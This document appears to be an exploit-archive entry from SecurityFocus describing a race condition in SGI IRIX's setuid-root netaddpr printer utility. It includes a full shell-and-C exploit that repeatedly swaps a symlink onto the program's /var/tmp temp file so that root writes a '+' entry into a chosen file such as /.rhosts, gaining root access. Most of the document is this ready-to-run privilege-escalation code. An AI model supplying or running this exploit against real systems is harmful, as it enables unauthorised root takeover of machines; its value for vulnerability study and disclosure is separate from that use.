52 lines
No EOL
1.6 KiB
Bash
Executable file
52 lines
No EOL
1.6 KiB
Bash
Executable file
source: https://www.securityfocus.com/bid/330/info
|
|
|
|
SGI's IRIX 5.x and 6.x operating system include a utility called /usr/lib/netaddpr. This program can be used by privledged users to add network printing devices to the system. A race condition exists in this program that could allow any "privledged" user to obtain root access.
|
|
|
|
The netaddpr program is shipped setuid root. As part of its execution, it creates a file in /var/tmp with the file template printersXXXXXX. Because the creation of the file and the actual opening of the file are independant events, there exists a window, during which time an attacker can replace the file with a symbolic link. By making this link point to, for instance, /.rhosts, an attacker can elevate their privledges to that of root.
|
|
|
|
#!/bin/sh
|
|
|
|
PROG="`basename $0`"
|
|
if [ $# -ne 1 ]; then
|
|
echo "Usage: $PROG <target>"
|
|
exit 1
|
|
fi
|
|
|
|
cat > expnetpr.c << _CREDIT_TO_ZOMO_
|
|
void main(int argc, char *argv[])
|
|
{
|
|
char *template = "/var/tmp/printersXXXXXX";
|
|
char *target;
|
|
int pid;
|
|
|
|
target = (char *)mktemp(template);
|
|
|
|
if ((pid = fork()) > 0) {
|
|
sleep(3);
|
|
umask(0);
|
|
execl("/usr/lib/addnetpr", "addnetpr", "localhost","+", 0);
|
|
}
|
|
else
|
|
while(1) {
|
|
symlink(argv[1], target);
|
|
unlink(target);
|
|
}
|
|
|
|
}
|
|
_CREDIT_TO_ZOMO_
|
|
|
|
/bin/cc expnetpr.c -o expnetpr
|
|
if [ ! -f expnetpr ]; then
|
|
echo "Couldn't compile expnetpr.c, lame! \nMake sure that C compiler has been installed from the IDO"
|
|
exit 1
|
|
fi
|
|
|
|
while(`true`)
|
|
do
|
|
./expnetpr $1&
|
|
PID=$!
|
|
sleep 15
|
|
ls -al $1
|
|
killall expnetpr
|
|
killall addnetpr
|
|
done |